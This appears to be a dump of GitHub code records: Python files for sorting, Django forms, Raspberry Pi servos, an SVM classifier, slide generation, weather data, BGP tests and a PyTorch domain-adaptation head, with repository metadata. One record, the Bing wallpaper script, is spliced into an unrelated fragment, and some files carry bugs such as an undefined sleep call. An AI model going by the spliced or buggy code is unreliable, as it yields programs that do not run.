# greater than index 0\n myNums[j+1] = myNums [j]\n j -= 1\n myNums[j+1] = element\n# 5. return the array\n return myNums\n# 6. 
call the function\nprint(insertion_sort())","repo_name":"adriansgrrx/5-Sorting-Algorithms","sub_path":"insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37670500018","text":"from django.core.exceptions import ValidationError\nfrom django.db.models import fields\nfrom django import forms\n\nfrom crispy_forms.helper import FormHelper\n\nfrom collection.models.chief_minister_form_collection import ChiefMinisterOfficeFormCollection\nfrom master_data import models\n\nclass ChiefMinisterOfficeFormCollectionForm(forms.ModelForm):\n \n class Meta:\n model = ChiefMinisterOfficeFormCollection\n fields = ('province', 'fiscal_year')\n exclude = ('user', )\n widgets = {\n 'province': forms.Select(attrs={'autocomplete': 'off'}),\n }\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'create_form'\n \n def save(self, commit=True):\n \"\"\"\n Create respective Chief Ministers Office Body, if it does not exist\n \"\"\"\n instance = super().save(commit=False)\n try:\n ia_name = 'मुख्यमन्त्री तथा मन्त्रीपरिषदको कार्यालय, ' + instance.province.name\n body = models.GovernmentBody.objects.get(name=ia_name)\n except models.GovernmentBody.DoesNotExist:\n body = models.GovernmentBody.objects.create(\n name=ia_name,\n type=models.GovernmentBodyType.objects.get(name='मुख्यमन्त्री तथा मन्त्रीपरिषदको कार्यालय'),\n province=instance.province,\n ) \n \n instance.body = body\n instance.save()\n return instance","repo_name":"Rabin5/formcollection","sub_path":"collection/forms/chief_minister_forms.py","file_name":"chief_minister_forms.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33592096873","text":"#!/usr/bin/env python \r\nimport sys, time\r\nimport RPi.GPIO as GPIO\r\nGPIO.setmode(GPIO.BOARD)\r\nservo1 = 16 # GPIO @ connected on 16 pin / Ref RasPi4B.\r\nservo2 = 17 # GPIO @ connected on 16 pin / Ref RasPi4B.\r\nservo3 = 18 # GPIO @ connected on 16 pin / Ref RasPi4B.\r\nGPIO.setup(servo1, GPIO.OUT, initial=GPIO.LOW) #Set GPIO \r\nGPIO.setup(servo2, GPIO.OUT, initial=GPIO.LOW) #Set GPIO \r\nGPIO.setup(servo3, GPIO.OUT, initial=GPIO.LOW) #Set GPIO \r\n\r\norder = ' '.join(sys.argv[1:])\r\n\r\nclass Control_servo:\r\n def Servo(self, order):\r\n self.order = order\r\n print (f\"Servo {self.order} ON!\") \r\n if (self.order == '1'):\r\n GPIO.output(16, GPIO.HIGH) # Turn on\r\n sleep(1) # Sleep for 1 second\r\n GPIO.output(16, GPIO.LOW) # Turn off\r\n sleep(1) # Sleep for 1 second\r\n \r\n elif (self.order == '2'):\r\n GPIO.output(17, GPIO.HIGH) # Turn on\r\n sleep(1) # Sleep for 1 second\r\n GPIO.output(17, GPIO.LOW) # Turn off\r\n sleep(1) # Sleep for 1 second\r\n \r\n elif (self.order == '3'):\r\n GPIO.output(18, GPIO.HIGH) # Turn on\r\n sleep(1) # Sleep for 1 second\r\n GPIO.output(18, GPIO.LOW) # Turn off\r\n sleep(1) # Sleep for 1 second\r\n \r\ns = Control_servo()\r\ns.Servo(order)","repo_name":"mo0303/Update_Project","sub_path":"order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38912510853","text":"import numpy as np\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.svm import SVC\nfrom 
sklearn import metrics\nfrom sklearn.externals import joblib\ndef create_SVM_Model(data):\n\n (train_texts, train_labels), (test_texts, test_labels) = data \n # Support Vectormachine\n svm_pip = Pipeline([ \n ('tfidf_vector_com', TfidfVectorizer(\n input='array', encoding=\"ISO-8859-1\",\n max_df=0.8,\n min_df=1,\n norm='l2',\n max_features=None, \n lowercase = True,\n sublinear_tf = True,\n stop_words='english',\n )),\n\n ('clf', SVC(C=10 , \n cache_size=10000, \n kernel='rbf', \n gamma = 0.1,\n probability =True, \n class_weight=None,\n tol=0.001))\n ])\n #SVM\n print(\"\\n --- TEST OUTPUT SVM ---\")\n svm_pip.fit(train_texts,train_labels)\n print(\"\\n --- SVM Training Done---\")\n predicted_SWR = svm_pip.predict(test_texts)\n predicted_SWR_train = svm_pip.predict(train_texts)\n print(\"\\n --- SVM Predicting Done---\")\n joblib.dump(svm_pip, 'SVMClassifier.sav', protocol=2)\n #Metrics\n print(\"Accuracy SVM test data: \" + str(np.mean(predicted_SWR == test_labels))) \n print(\"Accuracy SVM train data: \" + str(np.mean(predicted_SWR_train == train_labels)))\n\n\n","repo_name":"Zwitterion01/525Final","sub_path":"createSVM.py","file_name":"createSVM.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14468160570","text":"import os\nfrom pptx import Presentation\nfrom pptx.util import Inches, Cm, Pt\nimport os\n# ベースフォルダのパスを入力させる\nbase_folder = input(\"ベースフォルダのパスを入力してください: \")\n# ベースフォルダ内のサブフォルダを取得\nimage_folders = [f1 for f1 in os.listdir(base_folder) if os.path.isdir(os.path.join(base_folder, f1))]\ntemplate_file = 'test_template.pptx'\noutput_file = 'output.pptx'\n# パワーポイントプレゼンテーションを作成\npresentation = Presentation(template_file)\n# 画像フォルダ内の画像ファイルを取得\nfor image_folder in image_folders:\n image_files = [f for f in os.listdir(os.path.join(base_folder, image_folder)) if f.endswith(('.jpg', '.jpeg', '.png', '.gif'))]\n slide_layout = presentation.slide_layouts[6] # レイアウト6を使用するスライドレイアウト\n slide = presentation.slides.add_slide(slide_layout)\n # スライド上に画像を配置する位置とサイズの設定\n left = Cm(1) # 左端の位置(センチメートル単位)\n top = Cm(2) # 上端の位置(センチメートル単位)\n width = Cm(5) # 画像の幅(センチメートル単位)\n height = Cm(4) # 画像の高さ(センチメートル単位)\n space = Cm(1) # 画像間のスペース(センチメートル単位\n # フォルダ名を記載するテキストボックスを作成\n folder_name_textbox_left = Cm(12)\n folder_name_textbox_top = Cm(6)\n folder_name_textbox_width = Cm(8)\n folder_name_textbox_height = Cm(1)\n folder_name_textbox = slide.shapes.add_textbox(folder_name_textbox_left, folder_name_textbox_top, folder_name_textbox_width, folder_name_textbox_height)\n folder_name_text_frame = folder_name_textbox.text_frame\n folder_name_text_frame.word_wrap = False\n folder_name_text = folder_name_text_frame.add_paragraph().add_run()\n folder_name_text.text = image_folder\n folder_name_text.font.size = Pt(28)\n # README.mdのテキストを読み込む\n image_folder=os.path.join(base_folder, image_folder)\n readme_file = os.path.join(image_folder, 'README.md')\n if os.path.isfile(readme_file):\n with open(readme_file, 'r', encoding='utf-8') as f:\n readme_text = f.read()\n else:\n readme_text = \"\"\n # 画像をスライドに配置する\n for i, image_file in enumerate(image_files):\n if i % 9 == 0:\n slide_layout = presentation.slide_layouts[6] # レイアウト6を使用するスライドレイアウト\n slide = presentation.slides.add_slide(slide_layout)\n left = Cm(1) # 左端の位置(センチメートル単位)\n top = Cm(2) # 上端の位置(センチメートル単位)\n width = Cm(5) # 画像の幅(センチメートル単位)\n height = Cm(4) # 画像の高さ(センチメートル単位)\n space = Cm(1) # 画像間のスペース(センチメートル単位\n folder_name_textbox_left = Cm(1)\n 
folder_name_textbox_top = Cm(0.1)\n folder_name_textbox_width = Cm(8)\n folder_name_textbox_height = Cm(1)\n folder_name_textbox = slide.shapes.add_textbox(folder_name_textbox_left, folder_name_textbox_top, folder_name_textbox_width, folder_name_textbox_height)\n folder_name_text_frame = folder_name_textbox.text_frame\n folder_name_text_frame.word_wrap = False\n folder_name_text = folder_name_text_frame.add_paragraph().add_run()\n folder_name_text.text = image_folder\n folder_name_text.font.size = Pt(18)\n # テキストボックスを作成してテキストを貼り付ける\n textbox_left = Cm(19) # 左端の位置(センチメートル単位)\n textbox_top = Cm(1) # 上端の位置(センチメートル単位)\n textbox_width = presentation.slide_width - textbox_left - Cm(1) # テキストボックスの幅\n textbox_height = presentation.slide_height - textbox_top - Cm(1) # テキストボックスの高さ\n textbox = slide.shapes.add_textbox(textbox_left, textbox_top, textbox_width, textbox_height)\n # textbox = presentation.shapes.add_textbox(textbox_left, textbox_top, textbox_width, textbox_height)\n textbox.text = readme_text\n text_frame = textbox.text_frame\n text_frame.word_wrap = True\n # テキストボックスのテキストを設定\n p = text_frame.add_paragraph()\n p.text = readme_text\n # テキストの書式設定\n p.font.size = Pt(12) # フォントサイズを14ポイントに設定\n p.font.name = \"Meiryo\" # フォント名をMeiryoに設定\n image_path = os.path.join(image_folder, image_file)\n image_path= os.path.join(base_folder, image_path)\n image = slide.shapes.add_picture(image_path, left, top, width, height)\n left += width + space # 次の画像の左端位置を更新\n k=(i+1) % 3\n if k == 0:\n left=Cm(1)\n top += height + space # 次の行の上端位置を更新\npresentation.save(output_file)\nos.startfile(output_file)","repo_name":"ojirou/py2307_imgs_text2ppt","sub_path":"imgs_text2ppt.py","file_name":"imgs_text2ppt.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22878765685","text":"import datetime\nfrom datetime import datetime as dt\nimport numpy as np\nimport pandas as pd\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ntransform = 'Field Mill'\n\ndef time_date(row):\n row['datetime'] = f\"{row['Event Date']} {row['Event Time']}\"\n row['datetime'] = pd.to_datetime(row['datetime'])\n return row\n\ndef field_mill(path, launchtime):\n try:\n # load\n df = pd.read_csv(path)\n\n # merge date and time\n df = df.apply(time_date, axis=1) \n \n # remove excess columns\n df.drop(columns=['Event Date', 'Event Time', 'Mill Number'], inplace=True)\n\n groupby = df.groupby(by='datetime').mean()\n\n groupby.rename(columns={'One Minute Mean':'Field Mill Mean'}, inplace=True)\n \n\n # create empty dataframe in 5 minute time increments in the time zero\n l = (pd.DataFrame(columns=['NULL'],index=pd.date_range(launchtime - datetime.timedelta(hours=4), launchtime,freq='5T')))\n\n # merge_asof groups nearby indices with a tolerance of 5 minutes\n groupby = pd.merge_asof(l, groupby, left_index=True, right_index=True, tolerance=pd.Timedelta(\"5m\"))\n \n # created NULL column\n groupby.drop(columns='NULL', inplace=True)\n groupby = groupby.fillna(groupby['Field Mill Mean'].mean())\n logging.debug(f'Successfully transformed data for {transform} at {launchtime} from {path}')\n \n except:\n logging.warning(f'Generating empty dataframe for {transform} at {launchtime} from {path}')\n groupby=pd.DataFrame(columns=['Field Mill Mean'], index=pd.date_range(launchtime - datetime.timedelta(hours=4), launchtime,freq='5T'))\n\n \n return groupby\n 
","repo_name":"miscpeeps/bravo-wx-launch","sub_path":"field_mill_transform.py","file_name":"field_mill_transform.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"6175711196","text":"fname = 'input.txt'\n\nwith open(fname) as f:\n content = f.readlines()\ncontent = [x.strip() for x in content]\n\nused_coordinates = {}\nfor word in content:\n splits = word.split(\" \")\n coordinates = splits[2][:-1].split(\",\")\n lengths = splits[3].split(\"x\")\n\n # (0,0) is upper left coordinate\n x0 = int(coordinates[0]) + 1\n y0 = int(coordinates[1]) + 1\n\n lengthX = int(lengths[0])\n lengthY = int(lengths[1])\n\n for i in range (0,lengthX):\n for j in range (0, lengthY):\n x = x0 + i\n y = y0 + j\n if (x, y) not in used_coordinates:\n used_coordinates[(x, y)] = 1\n else:\n used_coordinates[(x, y)] += 1\n\ntotal_overlapping_inches = 0\nfor key, value in used_coordinates.items():\n if used_coordinates[key] > 1:\n total_overlapping_inches += 1\n\nprint(\"Total overlapping inches: \" + str(total_overlapping_inches))","repo_name":"martinmatak/AoC18","sub_path":"day3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39358440234","text":"import unittest\n\nfrom yabgp.common import exception as excep\nfrom yabgp.common.constants import ERR_MSG_UPDATE_ATTR_LEN\nfrom yabgp.message.attribute.aggregator import Aggregator\n\n\nclass TestAggregator(unittest.TestCase):\n def test_parse(self):\n\n # 4 bytes asn\n aggregator = Aggregator.parse(value=b'\\x00\\x00\\x70\\xd5\\x3e\\xe7\\xff\\x79',\n asn4=True)\n self.assertEqual((28885, '62.231.255.121'), aggregator)\n\n # 2 bytes asn\n aggregator = Aggregator.parse(value=b'\\x70\\xd5\\x3e\\xe7\\xff\\x79',\n asn4=False)\n self.assertEqual((28885, '62.231.255.121'), aggregator)\n\n # invalid attr len\n self.assertRaises(excep.UpdateMessageError, Aggregator.parse,\n b'\\x70\\xd5\\x3e\\xe7\\xff\\x79',\n True)\n try:\n Aggregator.parse(value=b'\\x70\\xd5\\x3e\\xe7\\xff\\x79',\n asn4=True)\n except excep.UpdateMessageError as e:\n self.assertEqual(ERR_MSG_UPDATE_ATTR_LEN, e.sub_error)\n\n def test_construct(self):\n\n aggregator = Aggregator.construct(value=(28885, '62.231.255.121'))\n self.assertEqual(b'\\xc0\\x07\\x06\\x70\\xd5\\x3e\\xe7\\xff\\x79', aggregator)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"smartbgp/yabgp","sub_path":"yabgp/tests/unit/message/attribute/test_aggregator.py","file_name":"test_aggregator.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"45"} +{"seq_id":"36903820550","text":"import requests\nimport re\nimport ctypes\nimport os\n\ndef getPic():\n root_url = 'https://cn.bing.com'\n pic_url = ''\n #获取壁纸的下载地址\n try:\n r = requests.get(root_url)\n pic_url = root_url+re.findall(r'num_line-n:\n print(y,end=\"\")\n y=x.readline()\n\nx.close()","repo_name":"Deep455/Python-programs-ITW1","sub_path":"python_assignment_3/py4.py","file_name":"py4.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"23286316942","text":"from django.contrib import admin\nfrom django.contrib.auth.models import Permission\nfrom django import forms\nfrom django.db.models import Count\nfrom django.template.response import 
TemplateResponse\nfrom django.urls import path\nfrom django.utils.html import mark_safe\nfrom .models import Category, Course, Lesson, Tag, User\nfrom ckeditor_uploader.widgets import CKEditorUploadingWidget\n\n\nclass LessonForm(forms.ModelForm):\n content = forms.CharField(widget=CKEditorUploadingWidget)\n\n class Meta:\n model = Lesson\n fields = '__all__'\n\n\nclass LessonTagInline(admin.TabularInline):\n model = Lesson.tags.through\n\n\nclass LessonAdmin(admin.ModelAdmin):\n class Media:\n css = {\n 'all': ('/static/css/main.css',)\n }\n\n form = LessonForm\n list_display = [\"id\", \"subject\", \"created_date\", \"course\"]\n search_fields = [\"subject\", \"created_date\", \"course__subject\"]\n list_filter = [\"subject\", \"course__subject\"]\n readonly_fields = [\"avatar\"]\n inlines = (LessonTagInline, )\n\n def avatar(self, lesson):\n return mark_safe(\"{alt}\".format(img_url=lesson.image.name, alt=lesson.subject))\n\n\n#Many to one\nclass LessonInline(admin.StackedInline): #StackedInline: tạo các form nằm chồng lên nhau\n model = Lesson #InlineModelAdmin: dạng inline chuẩn\n pk_name = 'course' #TabularInline: dạng bảng\n\n\nclass CourseAdmin(admin.ModelAdmin):\n inlines = (LessonInline, )\n\n\nclass CourseAppAdminSite(admin.AdminSite):\n site_header = 'HỆ THỐNG QUẢN LÝ KHÓA HỌC'\n\n def get_urls(self):\n return [\n path('course-stats/', self.course_stats)\n ] + super().get_urls()\n\n def course_stats(self, request):\n course_count = Course.objects.count()\n stats = Course.objects.annotate(lesson_count=Count('lessons')).values(\"id\", \"subject\", \"lesson_count\") #lessons: là related_name của biến course trong models\n return TemplateResponse(request, 'admin/course-stats.html', {\n 'course_count': course_count,\n 'stats': stats\n })\n\n\n#admin_site = CourseAppAdminSite('mycourse')\n\n\n# Register your models here. 
(Nơi cấu hình những thông tin của trang admin)\nadmin.site.register(Category)\nadmin.site.register(Course, CourseAdmin)\nadmin.site.register(Lesson, LessonAdmin)\nadmin.site.register(User)\nadmin.site.register(Permission)\n#admin_site.register(Category)\n#admin_site.register(Course, CourseAdmin)\n#admin_site.register(Lesson, LessonAdmin)","repo_name":"uyennguyen0721/LearnDjango","sub_path":"CourseApp/courseapp/courses/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26016580864","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom .anchor_head_template import AnchorHeadTemplate\n\nclass GradReverse(torch.autograd.Function):\n def __init__(self, lambd):\n self.lambd = lambd\n\n def forward(self, x):\n return x.view_as(x)\n\n def backward(self, grad_output):\n return (grad_output * self.lambd)\n\ndef grad_reverse(x, lambd):\n return GradReverse(lambd)(x)\n\nclass AnchorHeadSingleRangeGuidance(AnchorHeadTemplate):\n def __init__(self, model_cfg, input_channels, num_class, class_names, grid_size, point_cloud_range,\n predict_boxes_when_training=True, nusc=False, fpn_layers=[], **kwargs):\n super().__init__(\n model_cfg=model_cfg, num_class=num_class, class_names=class_names, grid_size=grid_size, point_cloud_range=point_cloud_range,\n predict_boxes_when_training=predict_boxes_when_training, nusc=nusc, fpn_layers=fpn_layers\n )\n\n self.num_anchors_per_location = sum(self.num_anchors_per_location)\n\n if self.range_guidance:\n if self.range_guidance_dom_only:\n input_channels_dom = input_channels + 2\n else:\n input_channels = input_channels + 2 + 256\n input_channels_dom = input_channels - 256\n else:\n input_channels_dom = input_channels\n\n self.conv_cls = nn.Conv2d(\n input_channels, self.num_anchors_per_location * self.num_class,\n kernel_size=1\n )\n self.conv_box = nn.Conv2d(\n input_channels, self.num_anchors_per_location * self.box_coder.code_size,\n kernel_size=1\n )\n\n self.rangeinv = self.model_cfg.get('RANGE_INV', False)\n self.keep_x = self.model_cfg.get('KEEP_X', False)\n self.keep_y = self.model_cfg.get('KEEP_Y', False)\n self.keep_xy = self.model_cfg.get('KEEP_XY', False)\n self.rm_thresh = self.model_cfg.get('RM_THRESH', 0)\n\n if self.rangeinv:\n self.conv_range = nn.Conv2d(\n input_channels, 1,\n kernel_size=1\n )\n #nn.Sequential(\n\n\n\n if self.model_cfg.get('USE_DIRECTION_CLASSIFIER', None) is not None:\n self.conv_dir_cls = nn.Conv2d(\n input_channels,\n self.num_anchors_per_location * self.model_cfg.NUM_DIR_BINS,\n kernel_size=1\n )\n else:\n self.conv_dir_cls = None\n\n\n # if self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None) is not None:\n\n if self.range_da > 0:\n self.domain_pool = nn.AdaptiveAvgPool2d(1)\n self.domain_classifier_range = nn.ModuleDict()\n for n in range(0+self.remove_near_range, self.range_da-self.remove_far_range):\n self.domain_classifier_range[str(n)] = nn.Sequential(nn.Linear(input_channels, 1024),\n nn.ReLU(True), nn.Dropout(),\n nn.Linear(1024, 256), nn.ReLU(True),\n nn.Dropout(), nn.Linear(256, 1))\n if self.keep_xy:\n self.domain_classifier_range2 = nn.ModuleDict()\n for n in range(0+self.remove_near_range2, self.range_da-self.remove_far_range2):\n self.domain_classifier_range2[str(n)] = nn.Sequential(nn.Linear(input_channels, 1024),\n nn.ReLU(True), nn.Dropout(),\n nn.Linear(1024, 256), nn.ReLU(True),\n nn.Dropout(), nn.Linear(256, 1))\n\n elif self.interval_da > 0:\n self.domain_pool = 
nn.AdaptiveAvgPool2d(1)\n self.domain_classifier_interval = nn.ModuleDict()\n for n in range(self.interval_da):\n self.domain_classifier_interval[str(n)] = nn.Sequential(nn.Linear(input_channels, 1024),\n nn.ReLU(True), nn.Dropout(),\n nn.Linear(1024, 256), nn.ReLU(True),\n nn.Dropout(), nn.Linear(256, 1))\n\n else:\n self.domain_pool = nn.AdaptiveAvgPool2d(1)\n self.domain_classifier = nn.Sequential(nn.Linear(input_channels_dom, 1024),\n nn.ReLU(True), nn.Dropout(),\n nn.Linear(1024, 256), nn.ReLU(True),\n nn.Dropout(), nn.Linear(256, 1))\n\n self.init_weights()\n\n def init_weights(self):\n pi = 0.01\n nn.init.constant_(self.conv_cls.bias, -np.log((1 - pi) / pi))\n nn.init.normal_(self.conv_box.weight, mean=0, std=0.001)\n\n def forward(self, data_dict):\n t_mode = data_dict['t_mode']\n l = data_dict['l']\n # print(\"t_mode\", t_mode)\n\n if 'pseudo' in t_mode:\n pseudo = True\n else:\n pseudo = False\n\n spatial_features_2d = data_dict['spatial_features_2d']\n\n # print(\"spatial_features_2d\", spatial_features_2d.shape) 126\n # print('range ctx',self.range_guidance)\n\n if t_mode == 'tsne':\n if self.range_da > 0:\n mid_dim = int(spatial_features_2d.shape[-1]/2.)\n range_interval = int(spatial_features_2d.shape[-1]/(2*self.range_da))\n\n start_dim = {}\n mid1_dim = {}\n mid2_dim = {}\n end_dim = {}\n interval_idx = {}\n interval_feat = {}\n if self.keep_xy:\n interval_feat2 = {}\n\n # for each range 0,1,2,3 (4)\n\n for n in range(0+self.remove_near_range, self.range_da-self.remove_far_range): # no0,1\n start_dim[n] = mid_dim - range_interval*(n+1) # 2-1=1, 2-2=0\n mid1_dim[n] = mid_dim - range_interval*n # 2-0=2 2-1=1 #int(spatial_features_2d.shape[-1]/2.)\n mid2_dim[n] = mid_dim + range_interval*n # 2+0=2 2+1=3\n end_dim[n] = mid_dim + range_interval*(n+1) # 2+1=3 2+2=4\n\n interval_idx[n] = torch.LongTensor([i for i in range(start_dim[n], mid1_dim[n])]+[i for i in range(mid2_dim[n], end_dim[n])])\n\n feat1 = spatial_features_2d[:,:,:,interval_idx[n]]\n feat1 = self.domain_pool(feat1).view(feat1.size(0), -1)\n data_dict[f'spatial_features_2d_x_{n}'] = feat1\n\n feat2 = spatial_features_2d[:,:,interval_idx[n],:]\n feat2 = self.domain_pool(feat2).view(feat2.size(0), -1)\n data_dict[f'spatial_features_2d_y_{n}'] = feat2\n\n\n if self.range_guidance and not self.range_guidance_dom_only:\n total_range = spatial_features_2d.shape[-1]\n half_range = int(spatial_features_2d.shape[-1] * 0.5)\n\n # x_range = torch.zeros((total_range, total_range)).cuda()\n # y_range = torch.zeros((total_range, total_range)).cuda()\n # for i in range(-half_range, half_range):\n # for j in range(-half_range, half_range):\n # x_range[i+half_range,j+half_range] = abs(i+0.5)\n # y_range[i+half_range,j+half_range] = abs(j+0.5)\n x_range = torch.abs(torch.arange(-half_range, half_range, 1).float() + 0.5).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat(spatial_features_2d.shape[0],1, total_range, 1).cuda()\n # print(\"x_range\", x_range)\n y_range = torch.abs(torch.arange(-half_range, half_range, 1).float() + 0.5).unsqueeze(-1).unsqueeze(0).unsqueeze(0).repeat(spatial_features_2d.shape[0],1,1,total_range).cuda()\n # print('x_range',x_range[0,-1])\n # print('y_range',y_range[0,-1])\n # print(\"spatial_features_2d 0\", spatial_features_2d.shape)\n # x_range = x_range.unsqueeze(0).unsqueeze(0).repeat((spatial_features_2d.shape[0],1,1,1))\n # y_range = y_range.unsqueeze(0).unsqueeze(0).repeat((spatial_features_2d.shape[0],1,1,1))\n # print('x_range',x_range.shape)\n # print('y_range',y_range.shape)\n spatial_features_2d = 
torch.cat((spatial_features_2d, x_range, y_range), dim=1)\n # print(\"spatial_features_2d\", spatial_features_2d.shape)\n\n # print(\"t_mode\", t_mode)\n if 'dom_img' in t_mode:\n\n if t_mode == 'dom_img_src':\n dom_src = True\n elif t_mode == 'dom_img_tgt':\n dom_src = False\n else:\n dom_src = None\n #\n if self.range_da > 0:\n mid_dim = int(spatial_features_2d.shape[-1]/2.)\n range_interval = int(spatial_features_2d.shape[-1]/(2*self.range_da))\n\n start_dim = {}\n mid1_dim = {}\n mid2_dim = {}\n end_dim = {}\n interval_idx = {}\n interval_feat = {}\n if self.keep_xy:\n interval_feat2 = {}\n\n # for each range 0,1,2,3 (4)\n\n for n in range(0+self.remove_near_range, self.range_da-self.remove_far_range): # no0,1\n start_dim[n] = mid_dim - range_interval*(n+1) # 2-1=1, 2-2=0\n mid1_dim[n] = mid_dim - range_interval*n # 2-0=2 2-1=1 #int(spatial_features_2d.shape[-1]/2.)\n mid2_dim[n] = mid_dim + range_interval*n # 2+0=2 2+1=3\n end_dim[n] = mid_dim + range_interval*(n+1) # 2+1=3 2+2=4\n\n # print(\"range n\", n)\n # print(\"start_dim[n]\", start_dim[n])\n # print(\"mid1_dim[n]\", mid1_dim[n])\n # print(\"mid2_dim[n]\", mid2_dim[n])\n # print(\"end_dim[n]\", end_dim[n])\n\n interval_idx[n] = torch.LongTensor([i for i in range(start_dim[n], mid1_dim[n])]+[i for i in range(mid2_dim[n], end_dim[n])])\n\n if self.keep_x:\n interval_feat[n] = spatial_features_2d[:,:,:,interval_idx[n]]\n # self.forward_ret_dict[f'spatial_features_2d_x_{n}'] = interval_feat[n]\n elif self.keep_y:\n interval_feat[n] = spatial_features_2d[:,:,interval_idx[n],:]\n # self.forward_ret_dict[f'spatial_features_2d_y_{n}'] = interval_feat[n]\n elif self.keep_xy:\n interval_feat[n] = spatial_features_2d[:,:,:,interval_idx[n]]\n # self.forward_ret_dict[f'spatial_features_2d_x_{n}'] = interval_feat[n]\n\n\n x_pool = self.domain_pool(interval_feat[n]).view(interval_feat[n].size(0), -1)\n x_reverse = grad_reverse(x_pool, l*-1)\n # dom_img_preds = self.domain_classifier_range[str(n)](x_reverse).squeeze(-1)\n dom_head_context = self.domain_classifier_range[str(n)][:-2](x_reverse)#.squeeze(-1)\n if 'dom_img_det' in t_mode:\n data_dict['dom_head_context'] = dom_head_context\n\n dom_img_preds = self.domain_classifier_range[str(n)][-2:](dom_head_context)#.squeeze(-1)\n\n self.forward_ret_dict[f'dom_img_preds_range{n}'] = dom_img_preds\n\n if self.keep_xy:\n interval_feat2[n] = spatial_features_2d[:,:,interval_idx[n],:]\n self.forward_ret_dict[f'spatial_features_2d_y_{n}'] = interval_feat2[n]\n\n x_pool2 = self.domain_pool(interval_feat2[n]).view(interval_feat2[n].size(0), -1)\n x_reverse2 = grad_reverse(x_pool2, l*-1)\n # dom_img_preds2 = self.domain_classifier_range2[str(n)](x_reverse2).squeeze(-1)\n\n dom_head_context2 = self.domain_classifier_range2[str(n)][:-2](x_reverse2)#.squeeze(-1)\n if 'dom_img_det' in t_mode:\n data_dict['dom_head_context2'] = dom_head_context2\n\n dom_img_preds2 = self.domain_classifier_range2[str(n)][-2:](dom_head_context2)#.squeeze(-1)\n\n self.forward_ret_dict[f'dom_img_preds_range{n}_2'] = dom_img_preds2\n\n if self.training:\n targets_dict_dom = self.assign_targets(\n gt_boxes=data_dict['gt_boxes'],\n dom_src=dom_src,\n pseudo=pseudo\n )\n self.forward_ret_dict.update(targets_dict_dom)\n\n elif self.interval_da > 0:\n\n # mid_dim = int(spatial_features_2d.shape[-1]/2.)\n range_interval = int(spatial_features_2d.shape[-1]/self.interval_da)\n\n start_dim = {}\n # mid1_dim = {}\n # mid2_dim = {}\n end_dim = {}\n interval_idx = {}\n interval_feat = {}\n\n # for each range 0,1,2,3 (4)\n\n for n in 
range(self.interval_da): # 0,1\n start_dim[n] = range_interval*n # 2-1=1, 2-2=0\n # mid1_dim[n] = mid_dim - range_interval*n # 2-0=2 2-1=1 #int(spatial_features_2d.shape[-1]/2.)\n # mid2_dim[n] = mid_dim + range_interval*n # 2+0=2 2+1=3\n end_dim[n] = range_interval*(n+1) # 2+1=3 2+2=4\n\n interval_idx[n] = torch.LongTensor([i for i in range(start_dim[n], end_dim[n])])\n\n # print(\"spatial_features_2d\", spatial_features_2d.shape)\n if self.keep_x:\n interval_feat[n] = spatial_features_2d[:,:,:,interval_idx[n]]\n elif self.keep_y:\n interval_feat[n] = spatial_features_2d[:,:,interval_idx[n],:]\n\n\n # print(\"interval_feat[n]\", interval_feat[n].shape)\n x_pool = self.domain_pool(interval_feat[n]).view(interval_feat[n].size(0), -1)\n # print(\"x_pool[n]\", x_pool.shape)\n x_reverse = grad_reverse(x_pool, l*-1)\n # dom_img_preds = self.domain_classifier_interval[str(n)](x_reverse).squeeze(-1)\n\n dom_head_context = self.domain_classifier_interval[str(n)][:-2](x_reverse)#.squeeze(-1)\n if 'dom_img_det' in t_mode:\n data_dict['dom_head_context'] = dom_head_context\n\n dom_img_preds = self.domain_classifier_interval[str(n)][-2:](dom_head_context)#.squeeze(-1)\n\n\n\n self.forward_ret_dict[f'dom_img_preds_interval{n}'] = dom_img_preds\n\n if self.training:\n targets_dict_dom = self.assign_targets(\n gt_boxes=data_dict['gt_boxes'],\n dom_src=dom_src,\n pseudo=pseudo\n )\n self.forward_ret_dict.update(targets_dict_dom)\n\n\n else:\n\n if self.range_guidance and self.range_guidance_dom_only:\n total_range = spatial_features_2d.shape[-1]\n half_range = int(spatial_features_2d.shape[-1] * 0.5)\n x_range = torch.abs(torch.arange(-half_range, half_range, 1).float() + 0.5).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat(spatial_features_2d.shape[0],1, total_range, 1).cuda()\n y_range = torch.abs(torch.arange(-half_range, half_range, 1).float() + 0.5).unsqueeze(-1).unsqueeze(0).unsqueeze(0).repeat(spatial_features_2d.shape[0],1,1,total_range).cuda()\n spatial_features_2d = torch.cat((spatial_features_2d, x_range, y_range), dim=1)\n\n\n\n x_pool = 